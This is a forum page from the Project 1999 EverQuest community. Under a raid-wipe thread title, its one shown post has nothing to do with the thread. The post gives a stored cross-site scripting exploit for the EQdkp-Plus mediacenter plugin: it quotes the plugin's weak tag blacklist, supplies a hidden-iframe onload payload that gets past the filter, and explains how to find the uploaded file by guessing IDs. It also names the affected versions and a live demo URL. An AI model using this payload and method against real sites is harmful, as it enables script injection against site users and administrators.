Project 1999

Go Back   Project 1999 > Red Community > Red Server Chat
Reload this Page We wiped to Cazic for 6 hours on Saturday
Home Forums Register Members List Today's Posts

 
 
Thread Tools Display Modes
Prev Previous Post   Next Post Next
  #4  
Old 06-26-2012, 08:02 PM
456 456 is offline
Orc


Join Date: Apr 2012
Posts: 39
Default
[code=plugins/mediacenter/include/mediacenter.class.php:421]
function check_content($fieldname){

$disallowed = "body|head|html|img|plaintext|a href|pre|script|table|title|php";
$disallowed_content = explode('|', $disallowed);
if (empty($disallowed_content))
{
return false;
}
[/code]

To get around this, you can use the Next design:
Code:
<iframe src="http://yandex.ru" style="display: none" onload="alert('XSS')">
</iframe>
After downloading the file to the server, you can find the file on request:
http://site.com/dkp/plugins/mediacen...p?mode=ajax&id = [ID].
[ID] - simple exhaustive search.

Example:
http://www.eqdkp-plus.com/demo06/dat...a3825c2494f2/m
ediacenter/thumbs_b/ee5bb2c59c237307d61bcb0bae1e08f2.htm

Vulnerable versions: <=0.6.4.5
 

« Previous Thread | Next Thread »

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


All times are GMT -4. The time now is 05:23 PM.

Privacy Policy - Project 1999 - Classic Everquest - Archive - Top

Everquest is a registered trademark of Daybreak Game Company LLC.
Project 1999 is not associated or affiliated in any way with Daybreak Game Company LLC. 		Powered by vBulletin®
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.